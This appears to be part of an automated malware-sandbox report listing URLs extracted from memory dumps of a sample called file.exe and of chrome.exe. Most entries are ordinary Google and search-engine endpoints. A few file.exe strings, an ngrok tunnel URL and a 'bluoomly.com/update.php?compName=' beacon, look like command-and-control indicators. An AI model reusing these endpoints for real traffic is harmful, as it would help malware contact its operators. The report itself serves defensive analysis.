Source: chrome.exe, 00000004.00000002.4610900724.000055A802C88000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.google.com/dl/release2/chrome_component/id6pvt3izjnss6i2ys3hc5x3a4_1143/efniojlnjndmcbiie
Source: chrome.exe, 00000004.00000002.4605464898.000055A8022F0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.google.com/dl/release2/chrome_component/imoffpf67hel7kbknqflao2oo4_1.0.2738.0/neifaoindgg
Source: chrome.exe, 00000004.00000002.4610900724.000055A802C88000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.google.com/dl/release2/chrome_component/j2hxfei2occ5siitujtlwgp6xi_3/ojhpjlocmbogdgmfpkhl
Source: chrome.exe, 00000004.00000002.4610574110.000055A802BD0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.gstatic.com/generate_204
Source: chrome.exe, 00000004.00000002.4609593969.000055A8029A4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: chrome.exe, 00000004.00000002.4604896839.000055A80221C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accountcapabilities-pa.googleapis.com/
Source: chrome.exe, 00000004.00000002.4605034221.000055A80226A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accountcapabilities-pa.googleapis.com/v1/accountcapabilities:batchGet
Source: chrome.exe, 00000004.00000002.4605034221.000055A80226A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accountcapabilities-pa.googleapis.com/v1/accountcapabilities:batchGetU
Source: chrome.exe, 00000004.00000002.4617383997.000055A803DCD000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.4609643231.000055A8029C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.4606974180.000055A8025DC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.4611828051.000055A802EB0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.4607467815.000055A802694000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com
Source: chrome.exe, 00000004.00000002.4611609370.000055A802E60000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.4604896839.000055A80221C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.3165690020.000055A802E5C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.3089262043.000055A802E5C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/
Source: chrome.exe, 00000004.00000002.4606195043.000055A8023C4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/AddSession
Source: chrome.exe, 00000004.00000002.4606367065.000055A802480000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/GetCheckConnectionInfo
Source: chrome.exe, 00000004.00000002.4606367065.000055A802480000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/ListAccounts?json=standard
Source: chrome.exe, 00000004.00000002.4606195043.000055A8023C4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/Logout
Source: chrome.exe, 00000004.00000002.4606195043.000055A8023C4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/MergeSession
Source: chrome.exe, 00000004.00000002.4606005419.000055A802394000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/OAuthLogin
Source: chrome.exe, 00000004.00000002.4606367065.000055A802480000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/RotateBoundCookies
Source: chrome.exe, 00000004.00000002.4606367065.000055A802480000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/chrome/blank.html
Source: chrome.exe, 00000004.00000002.4606367065.000055A802480000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/chrome/blank.htmlB
Source: chrome.exe, 00000004.00000002.4606367065.000055A802480000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/embedded/reauth/chromeos
Source: chrome.exe, 00000004.00000002.4605164477.000055A802290000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/embedded/setup/chrome/usermenu
Source: chrome.exe, 00000004.00000002.4605164477.000055A802290000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/embedded/setup/kidsignin/chromeos
Source: chrome.exe, 00000004.00000002.4605164477.000055A802290000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/embedded/setup/kidsignup/chromeos
Source: chrome.exe, 00000004.00000002.4604896839.000055A80221C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/embedded/setup/v2/chromeos
Source: chrome.exe, 00000004.00000002.4606367065.000055A802480000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/embedded/setup/windows
Source: chrome.exe, 00000004.00000002.4606367065.000055A802480000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/embedded/xreauth/chrome
Source: chrome.exe, 00000004.00000002.4606367065.000055A802480000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/encryption/unlock/desktop
Source: chrome.exe, 00000004.00000002.4605034221.000055A80226A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/encryption/unlock/desktop?kdi=CAIaDgoKY2hyb21lc3luYxAB
Source: chrome.exe, 00000004.00000002.4606367065.000055A802480000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/o/oauth2/revoke
Source: chrome.exe, 00000004.00000002.4606367065.000055A802480000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/oauth/multilogin
Source: chrome.exe, 00000004.00000002.4606367065.000055A802480000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/signin/chrome/sync?ssp=1
Source: chrome.exe, 00000004.00000002.4606195043.000055A8023C4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com:443
Source: chrome.exe, 00000004.00000002.4611828051.000055A802EB0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.como
Source: file.exe, 00000000.00000002.4587362165.0000000001203000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000003.2130272908.0000000007212000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://ace-snapper-privately.ngrok-free.app/test/test
Source: file.exe, 00000000.00000002.4587362165.0000000001203000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000003.2130272908.0000000007212000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://ace-snapper-privately.ngrok-free.app/test/testFailed
Source: chrome.exe, 00000004.00000003.3157687735.000055A8036DC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aida.googleapis.com/v1/aida:doConversation2
Source: chrome.exe, 00000004.00000003.2890941519.000055A8025C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2889468781.000055A8025C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2890979741.000055A802CEC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.4611828051.000055A802EB0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://anglebug.com/4830
Source: chrome.exe, 00000004.00000002.4611828051.000055A802EB0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://anglebug.com/4830t
Source: chrome.exe, 00000004.00000003.2890941519.000055A8025C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2889468781.000055A8025C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2890979741.000055A802CEC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.4611828051.000055A802EB0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://anglebug.com/4966
Source: chrome.exe, 00000004.00000003.2890941519.000055A8025C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2889468781.000055A8025C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2890979741.000055A802CEC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.4611828051.000055A802EB0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://anglebug.com/5845
Source: chrome.exe, 00000004.00000003.2890941519.000055A8025C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2889468781.000055A8025C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2890979741.000055A802CEC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.4611828051.000055A802EB0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://anglebug.com/6574
Source: chrome.exe, 00000004.00000002.4611828051.000055A802EB0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://anglebug.com/6574/
Source: chrome.exe, 00000004.00000003.2890941519.000055A8025C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2889468781.000055A8025C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2890979741.000055A802CEC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.4611828051.000055A802EB0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://anglebug.com/7161
Source: chrome.exe, 00000004.00000003.2890941519.000055A8025C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2889468781.000055A8025C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2890979741.000055A802CEC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.4611828051.000055A802EB0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://anglebug.com/7162
Source: chrome.exe, 00000004.00000003.2890941519.000055A8025C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2889468781.000055A8025C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2890979741.000055A802CEC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.4611828051.000055A802EB0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://anglebug.com/7246
Source: chrome.exe, 00000004.00000003.2890941519.000055A8025C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2889468781.000055A8025C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2890979741.000055A802CEC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.4611828051.000055A802EB0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://anglebug.com/7308
Source: chrome.exe, 00000004.00000002.4611828051.000055A802EB0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://anglebug.com/73088
Source: chrome.exe, 00000004.00000003.2890941519.000055A8025C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2889468781.000055A8025C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2890979741.000055A802CEC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.4611828051.000055A802EB0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://anglebug.com/7319
Source: chrome.exe, 00000004.00000003.2890941519.000055A8025C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2889468781.000055A8025C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2890979741.000055A802CEC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.4611828051.000055A802EB0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://anglebug.com/7320
Source: chrome.exe, 00000004.00000003.2890941519.000055A8025C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2889468781.000055A8025C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2890979741.000055A802CEC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.4611828051.000055A802EB0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://anglebug.com/7369
Source: chrome.exe, 00000004.00000002.4611828051.000055A802EB0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://anglebug.com/73697
Source: chrome.exe, 00000004.00000002.4611828051.000055A802EB0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://anglebug.com/73699
Source: chrome.exe, 00000004.00000002.4611828051.000055A802EB0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://anglebug.com/7369w
Source: chrome.exe, 00000004.00000003.2890941519.000055A8025C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2889468781.000055A8025C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2890979741.000055A802CEC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.4611828051.000055A802EB0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://anglebug.com/7382
Source: chrome.exe, 00000004.00000003.2890941519.000055A8025C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2889468781.000055A8025C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2890979741.000055A802CEC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.4611828051.000055A802EB0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://anglebug.com/7489
Source: chrome.exe, 00000004.00000003.2890941519.000055A8025C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2889468781.000055A8025C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2890979741.000055A802CEC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.4611828051.000055A802EB0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://anglebug.com/7604
Source: chrome.exe, 00000004.00000002.4611828051.000055A802EB0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://anglebug.com/7714
Source: chrome.exe, 00000004.00000003.2890941519.000055A8025C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2889468781.000055A8025C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2890979741.000055A802CEC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.4611828051.000055A802EB0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://anglebug.com/7847
Source: chrome.exe, 00000004.00000003.2890941519.000055A8025C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2889468781.000055A8025C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2890979741.000055A802CEC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.4611828051.000055A802EB0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://anglebug.com/7899
Source: chrome.exe, 00000004.00000003.2932575833.000055A80357C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2931640888.000055A803634000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2932361684.000055A8035E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2932824258.000055A803670000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.4615087930.000055A8035C1000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2931792088.000055A803644000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2932521331.000055A8035B4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2932633918.000055A803598000.00000004.00000800.00020000.00000000.sdmp, chromecache_81.6.dr, chromecache_76.6.dr String found in binary or memory: https://apis.google.com
Source: file.exe, 00000000.00000002.4605949885.000000006A629000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.4599659852.0000000008236000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://bluoomly.com/update.php?compName=
Source: chrome.exe, 00000004.00000002.4607764211.000055A8026FC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.4609593969.000055A8029A4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.4614046624.000055A8032B4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://calendar.google.com/calendar/u/0/r/eventedit?usp=chrome_actions
Source: chrome.exe, 00000004.00000002.4611648903.000055A802E74000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2941575547.000055A802E70000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.ico
Source: chrome.exe, 00000004.00000002.4611648903.000055A802E74000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2941575547.000055A802E70000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/favicon.ico
Source: chrome.exe, 00000004.00000002.4611648903.000055A802E74000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2941575547.000055A802E70000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/favicon.icofrom_play_api
Source: chrome.exe, 00000004.00000002.4611533959.000055A802E34000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/search
Source: chrome.exe, 00000004.00000002.4611533959.000055A802E34000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/search?ei=&fr=crmas&p=
Source: chrome.exe, 00000004.00000002.4611533959.000055A802E34000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/search?ei=&fr=crmas&p=searchTerms
Source: chrome.exe, 00000004.00000002.4608691799.000055A802864000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: chrome.exe, 00000004.00000003.2891727644.000055A802674000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.3422073797.000055A8030D4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.4608820859.000055A80289C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://chrome.google.com/webstore
Source: chrome.exe, 00000004.00000002.4608642219.000055A802840000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://chrome.google.com/webstore206E5
Source: chrome.exe, 00000004.00000002.4610574110.000055A802BD0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.4611648903.000055A802E74000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2941575547.000055A802E70000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.4614677292.000055A803424000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://chrome.google.com/webstore?hl=en
Source: chrome.exe, 00000004.00000002.4611648903.000055A802E74000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2941575547.000055A802E70000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://chrome.google.com/webstore?hl=en3
Source: chrome.exe, 00000004.00000002.4611648903.000055A802E74000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2941575547.000055A802E70000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://chrome.google.com/webstore?hl=enm
Source: chrome.exe, 00000004.00000003.2890487724.000055A802EF0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2898110498.000055A8030D4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2890379031.000055A802584000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2898017011.000055A802674000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2891830832.000055A802EF0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2895169359.000055A8030D4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2898049310.000055A802EF0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2890423096.000055A802674000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2891727644.000055A802674000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.3422073797.000055A8030D4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://chrome.google.com/webstoreLDDiscover
Source: chrome.exe, 00000004.00000002.4603752142.00003B280078C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://chromekanonymity-pa.googleapis.com/
Source: chrome.exe, 00000004.00000003.2873720472.00003B2800390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2874008316.00003B280039C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.3157687735.000055A8036DC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.3159824669.00003B280080C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://chromekanonymity-pa.googleapis.com/2%
Source: chrome.exe, 00000004.00000002.4603752142.00003B280078C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://chromekanonymityauth-pa.googleapis.com/
Source: chrome.exe, 00000004.00000003.2873720472.00003B2800390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2874008316.00003B280039C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.3157687735.000055A8036DC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.3159824669.00003B280080C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://chromekanonymityauth-pa.googleapis.com/2$
Source: chrome.exe, 00000004.00000002.4603752142.00003B280078C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://chromekanonymityauth-pa.googleapis.com/KAnonymityServiceJoinRelayServerhttps://chromekanonym
Source: chrome.exe, 00000004.00000003.2874820025.00003B2800684000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.4603752142.00003B280078C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://chromekanonymityquery-pa.googleapis.com/
Source: chrome.exe, 00000004.00000003.2873720472.00003B2800390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2874008316.00003B280039C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.3157687735.000055A8036DC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.3159824669.00003B280080C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://chromekanonymityquery-pa.googleapis.com/2O
Source: chrome.exe, 00000004.00000003.3521331179.000055A80253C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2893068381.000055A80253C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2889311373.000055A80253C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.4606701526.000055A80253C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2898345833.000055A80253C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.3641988936.000055A80253C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2891977218.000055A80253C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://chromereporting-pa.googleapis.com/v1/events
Source: chrome.exe, 00000004.00000002.4604896839.000055A80221C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://chromewebstore.google.com/
Source: chrome.exe, 00000004.00000002.4606195043.000055A8023C4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://classroom.googleapis.com/
Source: chrome.exe, 00000004.00000002.4606195043.000055A8023C4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://classroom.googleapis.com/g
Source: chrome.exe, 00000004.00000003.2869368086.00000ABC002E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2869321792.00000ABC002D8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://clients2.google.com/cr/report
Source: chrome.exe, 00000004.00000002.4608858476.000055A8028AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2885556153.000055A8026A0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.4604896839.000055A80221C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.4608367994.000055A8027E0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.4609035172.000055A8028F4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.4608578054.000055A802820000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://clients2.google.com/service/update2/crx
Source: chrome.exe, 00000004.00000002.4610533827.000055A802BB0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://clients3.google.com/cast/chromecast/home/wallpaper/collection-images?rt=b
Source: chrome.exe, 00000004.00000002.4610533827.000055A802BB0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://clients3.google.com/cast/chromecast/home/wallpaper/collection-images?rt=bU
Source: chrome.exe, 00000004.00000002.4610533827.000055A802BB0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://clients3.google.com/cast/chromecast/home/wallpaper/collections?rt=b
Source: chrome.exe, 00000004.00000002.4609593969.000055A8029A4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://clients3.google.com/cast/chromecast/home/wallpaper/image?rt=b
Source: chrome.exe, 00000004.00000002.4606195043.000055A8023C4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://clients4.google.com/chrome-sync
Source: chrome.exe, 00000004.00000002.4606195043.000055A8023C4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://clients4.google.com/chrome-sync/event
Source: chrome.exe, 00000004.00000002.4608642219.000055A802840000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://clientservices.googleapis.com/chrome-variations/seed?osname=win&channel=stable&milestone=117
Source: chrome.exe, 00000004.00000002.4614601244.000055A80340C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.4607143919.000055A802618000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.4610973450.000055A802CA4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://csp.withgoogle.com/csp/clientupdate-aus/1
Source: chrome.exe, 00000004.00000002.4610973450.000055A802CA4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://csp.withgoogle.com/csp/clientupdate-aus/1Cache-Control:
Source: chrome.exe, 00000004.00000002.4614601244.000055A80340C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://csp.withgoogle.com/csp/clientupdate-aus/1c
Source: chrome.exe, 00000004.00000002.4610821689.000055A802C54000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://csp.withgoogle.com/csp/report-to/gws/none
Source: file.exe, 00000000.00000003.2130272908.0000000007212000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://curl.se/docs/alt-svc.html
Source: file.exe, 00000000.00000003.2130272908.0000000007212000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://curl.se/docs/hsts.html
Source: file.exe, 00000000.00000002.4587362165.0000000001203000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000003.2130272908.0000000007212000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://curl.se/docs/http-cookies.html
Source: chrome.exe, 00000004.00000002.4605464898.000055A8022F0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://dl.google.com/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjhkYWYwZDctOTExOS00MGQ5LTgyNjA
Source: chrome.exe, 00000004.00000002.4607679783.000055A8026C8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://dl.google.com/release2/chrome_component/AMpg5-cnrANo_2018.8.8.0/2018.8.8.0_win64_win_third_p
Source: chrome.exe, 00000004.00000002.4612054884.000055A802F1C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://dl.google.com/release2/chrome_component/V3P1l2hLvLw_7/7_all_sslErrorAssistant.crx3
Source: chrome.exe, 00000004.00000002.4605464898.000055A8022F0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://dl.google.com/release2/chrome_component/acaldksiunzh56452py2db5mnbpa_120.0.6050.0/jamhcnnkih
Source: chrome.exe, 00000004.00000002.4610900724.000055A802C88000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://dl.google.com/release2/chrome_component/acasyasj5zdfzyyajpqoosfnex2a_9332/hfnkpimlhhgieaddgf
Source: chrome.exe, 00000004.00000002.4610900724.000055A802C88000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://dl.google.com/release2/chrome_component/acbk3qzfwhzj3ij3hxeo5shqbiyq_3051/jflookgnkcckhobagl
Source: chrome.exe, 00000004.00000002.4610356647.000055A802B68000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://dl.google.com/release2/chrome_component/acccxbt6wwsvpxzpob4hojndwkqq_4.10.2830.0/oimompecagn
